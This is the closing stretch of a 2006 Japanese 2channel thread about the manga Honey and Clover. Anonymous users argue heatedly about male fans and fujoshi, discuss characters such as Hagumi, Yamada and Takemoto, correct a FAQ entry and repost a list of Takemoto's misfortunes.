見て見ぬふりか、無理なフォローと応援を続けるけど

いったんアンチになると周りが引くくらい物凄い勢いで
今までの問題や募った不信感を蒸し返し爆発させまくり、
本人も現役のファン(この間まで同族)も叩き出すとかよくある。
あれに近い気するな、今の(ごく一部の)ハチクロ男ヲタは。

ここでひとつ
自称「女ヲタより品のあるハチクロ男ヲタ」のお花畑が荒野と化すような
トンでもない言動をウミノタンがかましてくれたら一気に各スレヒートアップしたり
糞スレ乱立するかもな。まあしなくて良いけど。

928 :花と名無しさん:2006/10/06(金) 17:41:59 ID:???O
まあネット上の意見なんかどこも極端になりやすいもんだよ

929 :花と名無しさん:2006/10/06(金) 17:55:31 ID:???0
いちご100%の男ヲタとかひどかったからなあ。
漫画自体は読んだこと無いけど応援ブログを目にしちゃって引いた。

930 :花と名無しさん:2006/10/06(金) 17:58:30 ID:???0
あれはひどかったなw
最終回のスレの荒れよう、嫌いなヒロイン叩き
見てる分には面白かったけど

931 :花と名無しさん:2006/10/06(金) 18:03:31 ID:mm0caaQ20
はぐ叩いてるのは女は、NANAでハチ叩いてるのと同族の連中だろ。

「自分は現実でこんなに不遇なのに漫画の対象キャラは優遇されていてズルい」
というなんとも短絡的な思考回路の持ち主だ。

932 :花と名無しさん:2006/10/06(金) 18:12:39 ID:???0
漫画については語り合いたいと思うが
住人について語り合いたいとは思わんので
>>931みたいな人はサロンにでもスレ立ててそっちでやってくれないかなー

933 :花と名無しさん:2006/10/06(金) 18:27:40 ID:???0
はぐ叩いてるのは女は
はぐ叩いてるのは女は
はぐ叩いてるのは女は

934 :花と名無しさん:2006/10/06(金) 18:43:35 ID:???0
ハチクロ読んで少女マンガ板に常駐してる男の意見とか
説得力ナッシングだよ・・・

935 :花と名無しさん:2006/10/06(金) 19:20:25 ID:???0
山田さん・・・大嫌い。

936 :花と名無しさん:2006/10/06(金) 19:28:20 ID:???0
山田は中学の時、学年全女子に妬まれていじめられた経験がありそう

937 :花と名無しさん:2006/10/06(金) 19:34:58 ID:???0
そうか?w
そんなイメージはないな、好きではないけど

938 :花と名無しさん:2006/10/06(金) 20:23:09 ID:???0
山田はイジメとかとは無縁でしょ
はぐは微妙
積極的にはいじめられてなくても学校に馴染めてなかったかもね

939 :花と名無しさん:2006/10/06(金) 22:46:19 ID:???0
ハチクロ読んで少女マンガ板に常駐してる男は
まだ住民に優しくされてるほうだよね。
逆だったら…、少年漫画板に「女ですが私はこう思う」みたいな
ことを書く女がいたら、ものすごい勢いで叩き。
2ちゃんの男ヲタの男尊女卑っぷりは恐ろしい。

940 :花と名無しさん:2006/10/06(金) 22:54:57 ID:???0
即、腐女子は帰れ状態になるんじゃね?w

941 :花と名無しさん:2006/10/06(金) 23:02:47 ID:???0
>>940
なるね。

男でも文章が丁寧で、主人公以外の男キャラを誉めたり
主人公以外の男キャラと女キャラの恋愛を応援するような書き込みをすると
腐女子コールが起こることもある。

942 :花と名無しさん:2006/10/06(金) 23:18:32 ID:???0
つかその常識が少年漫画板以外でも通用すると
思ってるのがちょろちょろ他へ出張してきて同じ事してるのが
なんとも言えない。

腐女子扱いしときゃ気に入らない意見はすべて封じ込められると
信じてるのが笑える。

943 :花と名無しさん:2006/10/07(土) 00:00:27 ID:???O
そういや関わったアーティストのスレでハチクロ布教活動したり
ウザがられたりしていた奴の中にも自称男が多かったな。

あくまで自称なので確認は出来ないが
単に一人称が俺とかじゃなく誰も聞いていないのに軽く自己紹介した後、
作者は選曲見ても分かるがセンスあるよとか
読んだ方がいい、絶対感動するとか書いて
それに対するレス(馬鹿にしたようなものじゃなく普通の反応)を
勝手に意味はき違えて逆ギレして終始一人相撲の奴いたわ。

944 :花と名無しさん:2006/10/07(土) 00:08:11 ID:???0
普段虐げられてる腐女子の逆襲みたいな展開だな・・(´Д`;;)
これだから他板でウザがられるんだよ

腐女子(女全部じゃないぞ)がこの板を初めとする一部の板でしか生息できない理由を考えてみろ

945 :花と名無しさん:2006/10/07(土) 00:20:24 ID:???0
生息はどこでもしてる

946 :花と名無しさん:2006/10/07(土) 00:32:46 ID:???0
>>944
今は腐女子よりも「少女漫画板」で執拗に女&腐女子叩きする奴が
うざいから言われてんだっつうの。
かわいいかわいい理想のロリはぐみ叩く女が耐えられないなら
大人しくアニメ板にこもってりゃいいのに

947 :花と名無しさん:2006/10/07(土) 00:35:40 ID:???O
DVDのジャケット あんまり よくねえな.......
まさか 一人 一巻で表紙飾るんかな

948 :花と名無しさん:2006/10/07(土) 00:50:05 ID:???0
まあ少女漫画板に居てる時点でどの雌でもフジョシのセンスは在ると思うけどね

949 :花と名無しさん:2006/10/07(土) 00:50:36 ID:???0
>>944
スニカエレ!!


これで満足か?

950 :花と名無しさん:2006/10/07(土) 01:16:23 ID:???0
>>946
944は過去レス読まなずにいきなりこの流れ見てびっくりしたか、
腐女子嫌い嫌い言ってた奴本人じゃね。どのみちほっときゃ良いよ。
>>984の言う事も一理あるしごく一部の非常識なキモ男ヲタ叩きはこの辺で。


で、あんま内容関係ないことで何なんだが
「ハチクロ好き」って奴、リアルにいる?

自分の周囲ではアニメ化の時も映画化の時も一切話題に出なかったので
テレビや雑誌で「流行ってる」といかれても実感沸かなかったし未だに沸かないんだけど。

951 :花と名無しさん:2006/10/07(土) 01:30:30 ID:???O
まあ一部のキモ腐女子が出張先に根をはって
同じような事をする日があるかもわからんし

こういう時はお互い様と言うことでね

比較的同族に近い人種に八つ当たりしてストレス発散できるなら
本人のアホっぷりが広まるのも防げるかもしれないし
可哀想なのでもういいんじゃないかな

952 :花と名無しさん:2006/10/07(土) 01:38:15 ID:???0
DVDのジャケットどこにのってる?

953 :花と名無しさん:2006/10/07(土) 01:40:48 ID:???0
頭のおかしいこといってるのはお前らの方なんだけどな。
俺がいつ「かわいいかわいい理想のロリはぐみ」とか言ったよ?
過剰に叩かれるほど大したキャラクターじゃない(ついでにこの漫画も)って言ってるだけなんだけどなぁ・・。
本当に思い込み激しい人種なんだな('A`)

叩かれる理由も良くわかったんで退散するか。
こりゃ確かに係わり合いになりたくねぇ。

954 :花と名無しさん:2006/10/07(土) 01:42:03 ID:???0
やっとお客さん帰るみたいだよ
去り際まで醜くて最後までウザかったなあ

955 :花と名無しさん:2006/10/07(土) 01:51:39 ID:???0
アンチ腐女子ならこんなところに来なければいいのに・・

気に入らない女キャラ叩いてる腐を指差してこいつ腐女子だろとか
デブに向かってデブっていうようなもんだよ

956 :花と名無しさん:2006/10/07(土) 02:09:50 ID:???O
被害妄想激しいとか関わりたくないとか…どっちがだよ

>>953がどこのどいつかもどのレスと同一かも知らんしどうでもいい事。
ここで常駐している腐女子大嫌い大嫌いのスレ&気違いちゃん全般に対する
当たり前の指摘が、今まで我慢していた住人により一通り吐き出されただけで
どれか一つのレスの内容だけの問題じゃないっつうのに。

そんなことは過去レスと空気読めばわかる。判らないなら
被害者アピールも退避宣言も心の底からいらんから早く帰れって。

957 :花と名無しさん:2006/10/07(土) 02:13:20 ID:???0
というか漫画スレで住人について思い込みで分析してウザがられないと思う方がおかしい
どの板に行ってもウザがられるタイプだな

958 :花と名無しさん:2006/10/07(土) 02:18:45 ID:???0
過ぎ去ったあとに陰口たたき始めるなよ負け犬共が

>>956
>ここで常駐している腐女子大嫌い大嫌いのスレ&気違いちゃん全般に対する
>当たり前の指摘が、今まで我慢していた住人により一通り吐き出されただけで

俺は数多くの真人間達が今までお前らに極々アタリマエの指摘をしてきたことに対して、
お前らが身勝手に貯めてきたストレスの発散対象だったのかwwwwwww
キチガイの極みだなwwww

>>957
>どの板に行ってもウザがられるタイプだな
また思い込みでレスしてるな。本当に思い込み激しい('A`)


お前らのレスの一つ一つどれをとっても思い込みと妄想でしかレスしてないんだよ。
いい加減叩かれる理由を悟って欲しいね。

959 :花と名無しさん:2006/10/07(土) 02:26:20 ID:???O
少なくとも953が

関わり合おうと自ら来て

作品に大して触れず主に住人の傾向のみに触れ

過去スレ読まず見当違いな事を適当に書き散らかし

途中で主人公が叩かれる理由が分かりましたと

ここに来たことによってそれが分かったのに

もう関わり合いたくないねと文句だけを言い残し

帰った


という事は確かで、これだけで十分恥

960 :花と名無しさん:2006/10/07(土) 02:29:19 ID:???O
>>958
帰ってなかったのか

961 :花と名無しさん:2006/10/07(土) 03:02:55 ID:???O
>>958
(´Д`)(´Д`)(´Д`)(´Д`)(´Д`)






触っちゃいけないと思いつつ、大物が来た予感に
なんだかオラわくわくしてきたぞwwwwww

962 :花と名無しさん:2006/10/07(土) 04:48:00 ID:???0
また来たら完全に負けだからもう来ないと思ったのに
想像以上のアホだったw
ここでムカついてもレスしなかったらまだマシだったのに

963 :花と名無しさん:2006/10/07(土) 04:49:36 ID:???0
>>958は引き際間違えると本気で格好悪いってこと体現してくれたレスだなwwwwwww

964 :花と名無しさん:2006/10/07(土) 04:51:28 ID:???0
もう来ないって言う奴は絶対また来るの法則だねw


965 :花と名無しさん:2006/10/07(土) 05:17:15 ID:???0
可哀相なくらい想定内な人だな
また来たらオモシロスwwwwwwwwwwwww

966 :花と名無しさん:2006/10/07(土) 05:20:31 ID:???0
>>958
漫画サロンのハチクロアンチスレをおすすめする。
簡単に腐女子の意見と括れない書き込みが読めますよ。
自分は腐の意見も視点を変えて読むためのヒントになると思っていますがね。
どこの意見も思い込みは当たり前、気にしないほうがいい。
あまりこだわると自分も発言できなくなるんでね。

967 :花と名無しさん:2006/10/07(土) 08:08:42 ID:???0
>>960-961
スレ住民と上手くいかなくて
捨てゼリフを書いて去っていく奴が
本当にそのスレから去ったためしなどないからね。

中二病の毒喪男にスレ住民が言い返してるのを読んだ時
スーッとしたけど、さすがにもう飽きたしループだから
今後はこの毒喪男は無視無視で行ければいいなと思う。
もうみんなに「あーいつもの毒喪だな」って浸透したと思うし。

968 :花と名無しさん:2006/10/07(土) 08:10:57 ID:???0
>>966
てか、ヤツはアンチスレのほうにもとっくに生息してるよ。
本スレ住民叩きを何度も何度もふって
本スレ叩きにもっていこうとするのでわかりやすい。
アンチスレ住民のほとんどはヤツをかまってないようだが。

969 :花と名無しさん:2006/10/07(土) 08:18:19 ID:???0
一生居心地いい少年漫画板にモソモソこもってればいいのに。
腐女子叩きもそうだそうだで同意してくれるし。
ロリと綾波と一途な処女美少女が出てる少女漫画があるからって
少女漫画板まで来たのがそもそもの間違い。

970 :花と名無しさん:2006/10/07(土) 08:29:04 ID:???0
>>966見て思ったけど、男って、イタタ男に優しいよなぁ。
イタタ男にガツンといってる男をめったに見たことない。

971 :花と名無しさん:2006/10/07(土) 08:41:25 ID:???0
>>970
ガツンと言っても効果がないどころか、逆ギレされてもっと酷いことになるので
優しい言い方で操縦してると思われ。

972 :花と名無しさん:2006/10/07(土) 08:52:39 ID:???0
まぁいざとなると手厳しいのは女の方かもね
つーか今更優しく諭す段階は過ぎてるけどさ

ところで>>970次スレお願い

973 :花と名無しさん:2006/10/07(土) 09:39:11 ID:???0
>>972
ゴメソ、たてられなかった…。
あとこれから出かける…。

次スレでは>>296にある「竹本の不幸」など
テンプレもちゃんと入れなおしてください。


974 :花と名無しさん:2006/10/07(土) 11:03:24 ID:???0
テンプレといえば
>>3
> Q.花本はぐみは、花本修司の姪ですよね?
> A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています
なんだけど、
映画でも「いとこの娘」だったよ。


975 :花と名無しさん:2006/10/07(土) 11:47:47 ID:???0
>>921
性別を逆に考えてみるといいんじゃないかな

才能だけはあるが、コミュニケーション不全の男が
そこそこ気になってた同士の女はむこうが甘えてきたら切捨てで
性格はいいけど才能も金もない平凡な女ははなから問題外で
とりあえず恋愛ではないけど精神的に無償で一生食わせてくれる女を
芸術の為に取った
ちなみにひとりで芸術の為生きるという選択肢は無し

976 :花と名無しさん:2006/10/07(土) 11:54:56 ID:???O
>>974
映画のパンフレットでは
にしたほうがいいかもね。

977 :花と名無しさん:2006/10/07(土) 12:23:38 ID:???0
竹本の不幸のテンプレって>>296じゃなくてもっと長い奴がなかったっけ?

978 :花と名無しさん:2006/10/07(土) 16:20:14 ID:???0
>>975
擁護じゃないけど

男女逆に考えてみたらとかよく言う人いるけど
実際はそんな単純な事じゃないよね?

社会的立場だとか、子供産んだりだとかさ

逆にしてみて男でこんなんいたら最悪でしょーみたいな言い方はどうだろう

スレ違いかもしらんが

979 :花と名無しさん:2006/10/07(土) 16:46:48 ID:???0
>>978
そんな大げさに考えるほどでもないのでは?
ただ例えとして不適当だったってだけのこと

980 :花と名無しさん:2006/10/07(土) 17:14:43 ID:???O
腐叩きに過剰反応するから腐って言われるんじゃないか?
そんなに腐女子と言われるのが嫌なのか?

981 :花と名無しさん:2006/10/07(土) 17:16:20 ID:???0
>>980
腐女子ktkr

982 :花と名無しさん:2006/10/07(土) 17:17:50 ID:???0
貴腐人と呼んで

983 :花と名無しさん:2006/10/07(土) 17:25:42 ID:???O
自分が腐臭を纏った行為をやった可能性だってあるしね

984 :花と名無しさん:2006/10/07(土) 17:55:18 ID:???0
>>980
>>983

過剰か?
>>950-951みたいなのもいたし
>>983が言ったような事も気をつけなきゃとは思うが
そもそも腐叩きの存在自体がスレ違いなんだから

985 :花と名無しさん:2006/10/07(土) 18:03:26 ID:???0
「存在自体がスレ違い」て酷いなw
禿げ同だけど。

しかし今回ほど特定のスレで執拗に粘る者も珍しいな。
日本語が苦手な方みたいなので今後はスルーで。
(一人かどうかは分からんがこんな馬鹿は一人であると思いたい)

986 :花と名無しさん:2006/10/07(土) 18:06:42 ID:???0
ま、とりあえず携帯厨がしつこいっていうことだけは分かった

987 :花と名無しさん:2006/10/07(土) 18:08:53 ID:???0
視野の狭いウ゛ァカなんだよ。
慣れ親しんだ価値観がいつもと違ってなぜか受け入れられなかったんで
わけがわからなくなってついキレちゃったんだろうね。

988 :花と名無しさん:2006/10/07(土) 18:46:45 ID:???0
>>977
これ?

●● 竹本の不幸  ●●
・小学生の頃父が他界。高校で母が再婚するが、自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。ここから真の不幸が始まる。
・今日なんで集まったんだっけ?「ぼくの誕生日ですよ」しかもツイスターゲーム。
・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。
・森田がはぐを好きだと気付き、勝ち目が無いと悟りぼんやりする。
・夜、電話一本でクリスマスなのにバルーンアートを徹夜で作る手伝いにかりだされる。不眠でバイトへ。
・「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」
・就職に失敗し続け学園祭用の謎の塔を一心不乱に作り続ける。この頃から鬱病気味に。
・錯乱した山田のかかと落としが直撃。
・「いるべき人が いなくって いなくても どってことない人間が ここでケーキを口に運んでいる」
 クリスマスケーキを食べながら超ネガティブ思考。そしてまたツイスターゲーム。
・卒業制作の作業中に吐血>入院>浪人。
・内定が決まった日に、就職先がどうやら倒産しそうだという報せが就職祝い中に届く。
・幻聴が聴こえてくる。気付いたら自転車で海へ。ここは精神崩壊の瀬戸際だったがなんとか持ちこたえた。
・ママチャリであてもなく日本列島を北上。痔になる。
・旅先で住み込みバイト中に、年下の元ヤンから「おまえ」「ばかじゃねーの」等の罵声を浴びる。
・一皮むけて旅から帰ってきてフラれる。

●● 竹本の人格崩壊後 ●●●●●●●●

・花も買えない情けない男
・森田をねたんで、森田にはぐみを取られるくらいなら修に取られる
 ほうがマシだと、修にはぐみに愛の告白をするようたきつける
・兄貴と関係で不幸のズンドコの森田に対して、人間として
 言ってはいけないことを言う

989 :花と名無しさん:2006/10/07(土) 19:45:24 ID:???0
次スレ立ってないのに雑談始める人達ってアホなの?

990 :花と名無しさん:2006/10/07(土) 20:04:05 ID:???0
アホのあつまりだと思うよ
だからスレ立てはお利口さんのお前にまかせた

991 :花と名無しさん:2006/10/07(土) 23:19:09 ID:???O
懐古板に移動

992 :花と名無しさん:2006/10/08(日) 02:54:57 ID:???0
ズン・・・ズンズンズンドコ・・・しのぶ!!

993 :花と名無しさん:2006/10/08(日) 03:29:28 ID:???O


994 :花と名無しさん:2006/10/08(日) 03:30:59 ID:???O


995 :花と名無しさん:2006/10/08(日) 03:36:10 ID:???O


996 :花と名無しさん:2006/10/08(日) 03:42:20 ID:???O


997 :花と名無しさん:2006/10/08(日) 03:49:01 ID:???0
アホじゃない>>989さん次スレお願いします。

998 :小倉優子 ◆en0rG2J.f6 :2006/10/08(日) 06:24:36 ID:???0
^


999 :小倉優子 ◆en0rG2J.f6 :2006/10/08(日) 06:25:18 ID:???0
^

1000 :小倉優子 ◆en0rG2J.f6 :2006/10/08(日) 06:25:58 ID:???0
1000ならジュースでも飲むか

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

254 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)